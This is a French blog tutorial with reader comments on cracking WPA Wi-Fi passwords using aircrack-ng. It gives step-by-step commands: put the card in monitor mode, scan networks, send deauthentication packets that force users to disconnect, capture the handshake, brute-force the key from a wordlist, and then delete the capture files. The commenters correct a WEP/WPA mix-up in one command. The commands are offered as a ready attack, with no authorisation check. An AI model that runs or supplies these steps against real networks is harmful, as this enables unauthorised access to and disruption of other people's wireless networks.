1.Initialisez la carte wlan0
Sauvegardez raz dans « root »
(wlan0 par default,changez sinon le fichier raz)
Dans un terminal tapez:
bash raz
2.Analysez les réseaux wifi
airodump-ng mon0
3.Capturer le handshake
airodump-ng -c 6 -w capture — encrypt wpa mon0
aireplay-ng -0 1 -e ESSID mon0
4.Crack avec Dico
aircrack-ng -w dico.txt *.cap
5.Supprimer les fichiers .cap .xor etc…
Sauvegardez rm dans « root »
Dans un terminal tapez:
bash rm
Autre façon pour forcer l’utilisateur à se déconnecter:
aireplay-ng -0 0 -a AP_MAC -c CLIENT_MAC mon0
aireplay-ng -0 0 -a AP_MAC mon0
Enjoy !
salut 😉
il me semble qu'il y a une erreur sur ton tuto relis toi 😉
J’aimeJ’aime
Heu…je ne vois pas!
Dis l'erreur au lieu de dire ça 😉
J’aimeJ’aime
bon du coup 😉
je reprends:
[Backtrack 5 R3] Crack WPA Avec Dico
Aircrack-ng
CRACK WPA Avec Dico
1.Intialisez la carte wlan0
Sauvegardez raz dans « root »
(wlan0 par default,changez sinon le fichier raz)
Dans un terminal tapez:
bash raz
2.Analysez les réseaux wifi
airodump-ng mon0
3.Capturer le handshake
airodump-ng -c 6 -w capture — encrypt wep mon0
aireplay-ng -0 1 -e ESSID mon0
4.Crack avec Dico
aircrack-ng -w dico.txt *.cap
5.Supprimer les fichiers .cap .xor etc…
Sauvegardez rm dans « root »
Dans un terminal tapez:
bash rm
tu indique craquer une clef WPA ok 😉 mais en 3. quand tu veux cap le handshake dans ta ligne de commande tu mets un WEP
et c'est exactement la meme ligne que dans le tuto du WEP 😉
ensuite tu mets aussi le canal 6 dans le tuto d'apres tu précises bien qu'il faut le changer mais bon… des fois que… certains s’arrêtent de lire trop tot les tutos !
J’aimeJ’aime
Ha oui comme ça je préfère 🙂
Effectivement j'avais fait un copier/coller car les commandes se ressemblent,et oui le wpa est passé a la trappe,c'est maintenant corrigé,merci ! 🙂
J’aimeJ’aime
pas de soucis 😉
J’aimeJ’aime